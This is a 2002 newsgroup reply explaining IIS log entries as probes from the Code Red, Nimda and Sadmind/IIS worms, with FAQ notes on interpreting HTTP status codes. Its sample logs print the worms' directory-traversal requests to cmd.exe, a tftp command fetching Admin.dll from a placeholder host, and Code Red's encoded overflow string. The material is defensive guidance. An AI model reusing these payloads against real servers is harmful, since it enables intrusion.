Re: Strange Log File Entries

From: Karl Levinson [x y] mvp (levinson_k@excite.com)
Date: 11/05/02


From: "Karl Levinson [x y] mvp" <levinson_k@excite.com>
Date: Mon, 4 Nov 2002 22:05:43 -0500


"Jaffa" <jaffa@cakes.com> wrote in message
news:OU6Yx9GhCHA.2508@tkmsftngp08...
> Can anyone explain these entries in my log file? Is it a virus attack? I
> have no idea where they came from and why they are trying to access
cmd.exe.
> I have Win2k SP3 installed, and all the other critical updates. X.X.X.X is
> my the IP address of my IIS server.
>
> 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> /winnt/system32/cmd.exe 404 3 144 124 0 - - -
> 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> /winnt/system32/cmd.exe 404 3 144 91 0 - - -
> 2002-11-04 21:15:32 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 87 0 95 0 - - -

Yes, looks like an old worm. The codes 404 and 500 show that this was
probably not successful.

Note that not only do you need the latest updates, but you also need to have
your web server configured correctly, per the hardening windows 2000 and IIS
checklists at www.microsoft.com/technet/security, www.nsa.gov,
http://rr.sans.org, etc. It also sounds like you have not installed
IISlockdown which includes URLScan, a very helpful tool in blocking this
stuff.

Read below for more info on reading your IIS logs:

================

These are signs of well-known worms [the Code Red and/or Nimda worm] that
spread from server to infected server. Probably every web server on the
Internet has received and will continue to receive these "attacks," perhaps
several times a day, whether or not the servers are vulnerable to the worm,
even if firewalls and/or antivirus are being used.

The IP address that is sending the requests to your server is likely another
infected web server and not necessarily a hacker.

If you are seeing the log entries in the URLSCAN.LOG file, then URLScan has
successfully blocked that worm attack. [However, the existence of URLScan
does not necessarily prove that a computer is free of all viruses and worms;
for example, a computer that was infected with a worm before URLScan was
installed could still be infected.]

The best way to tell whether your server has been infected is to install and
use an antivirus program.

It is not necessarily always accurate to deduce from the 200, 404 and 500 /
502 codes in a web server log whether or not the server has been infected.
For more information on this, see the section in this FAQ entitled "I found
a code 200 [or 502] in my IIS logs, does that mean my web server has been
successfully hacked?"

For more information on these worm attacks, visit the web site of your
favorite antivirus vendor and/or visit the links below:

www.cert.org
www.cve.mitre.org/cve
www.nipc.gov
www.eeye.com
www.microsoft.com/technet/security

Below are samples of what an IIS web server log would look like when
attacked by a worm such as Nimda, Code Red and/or Sadmind / IIS worms:

NIMDA LOOKS LIKE THIS =======================

[Note that the system is likely compromised if you see a code 200 in the
line where the "tftp.exe" command is used to download the file "Admin.dll,"
as in the last line below. Note however that the lines below containing the
"copy" and "echo" commands were also successful, despite the 502 code which
usually indicates failure.]

GET /scripts/root.exe?/c+dir 200 -
GET /MSADC/root.exe?/c+dir 200 -
GET /c/winnt/system32/cmd.exe?/c+dir 200 -
GET /d/winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy
stem32/cmd.exe?/c+dir 200 -
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 200 -

GET /scripts/../../winnt/system32/cmd.exe
/c+copy+\winnt\system32\cmd.exe+root.exe 502 -
GET /scripts/root.exe /c+echo+.././index.asp 502 -

GET
/scripts/..%2f../winnt/system32/cmd.exe?/c+tftp%20i%20x.x.x.x%20GET%20Admin.
dll%20d:\Admin.dll 200 -

CODE RED LOOKS LIKE THIS: =======================

[Note that a code 200 after the "GET /default.ida?" line in a Code Red
attack does not necessarily indicate success or failure. It means that the
.ida mapping has not been removed from the IIS server, and it probably
should be.]

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a

CODE RED II LOOKS LIKE THIS: ======================

[Note that a code 200 after the "GET /default.ida?" line in a Code Red
attack does not necessarily indicate success or failure. It means that the
.ida mapping has not been removed from the IIS server, and it probably
should be.]

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
0%u531b%u53ff%u0078%u0000%u00=a 200 -

SADMIND / IIS WORM LOOKS LIKE THIS: ===============

[Note that this is what the log looks like on a successfully compromised
system - the code 502 after the "copy" and "echo" commands does not indicate
failure here, the commands were successful despite the 502.]

GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
GET /scripts/../../winnt/system32/cmd.exe
/c+copy+\winnt\system32\cmd.exe+root.exe 502 -
GET /scripts/root.exe /c+echo+.././index.asp 502 -

[Thanks to "Gurn" and others]
________________________________________________________

(11.19) I found a code 200 [or 502] in my IIS logs, does that mean my web
server has been successfully hacked?

A: Not necessarily. Because of this uncertainty, the best way to tell
whether your server has been infected is to install and use an antivirus
program.

Normally, a code 502 in an IIS web server log normally indicates that the
request was unsuccessful. However, in some cases, the code 502 does not
indicate failure [for example the code 502 after the "copy" and "echo"
commands used by the Sadmind / IIS Worm and Nimda].

Similarly, a code 200 after a line in an IIS web server log indicates that
the request was successful. However, read the post below by Paul Lynch
regarding a 200 code after a "GET /default.ida" request [as with the Code
Red worm]:

"...a lot of confusion surrounds the 200 return code in response to the GET
/default.ida request.

In a nutshell what this means is that if you haven't removed the .ida
mapping IIS processes the request successfully and returns a 200 to the
browser.

What it *doesn't* mean is that the worm has successfully penetrated your
machine. A patched Index Service will still return a 200 to a browser if
the .ida mapping is present."

A code 404 in the logs so far still appears to indicate an unsuccessful
request [or attack], due to the attacker or worm requesting a file that does
not exist on the server.

Again, because of this uncertainty, the best way to tell whether your server
has been infected is to install and use an antivirus program.

[Thanks to Paul Lynch]



Relevant Pages

  • Re: Strange Log File Entries
    ... >> my the IP address of my IIS server. ... looks like an old worm. ... > successfully blocked that worm attack. ... the commands were successful despite the 502.] ...
    (microsoft.public.inetserver.iis.security)
  • Re: IIS Seperate Partition?
    ... >>codes to attack. ... >by the Code Red II worm. ... Nimda did NOT depend on Code ... Code Red was a buffer overrun in the Index Server ...
    (microsoft.public.inetserver.iis.security)
  • Re: strange entry in IIS log
    ... you got hit and the attack was successful. ... This is CodeRed virus which attack using buffer overflow technique. ... >>> web access I decided to open iis on our server. ... >>> Please reply to newsgroups only. ...
    (microsoft.public.inetserver.iis.security)
  • Re: Web server response to attacks
    ... >attack signatures in the log. ... >successful exploit, I am wondering if that is true. ... vulnerability scans showing whether the server was vulnerable). ... you may never see a log entry. ...
    (Focus-IDS)
  • Tcp/ip failing when server rebooted.
    ... I have an SBS 2003 that suffered an attack - possibly a worm ... - and since this time whenever the server is rebooted and ...
    (microsoft.public.windows.server.sbs)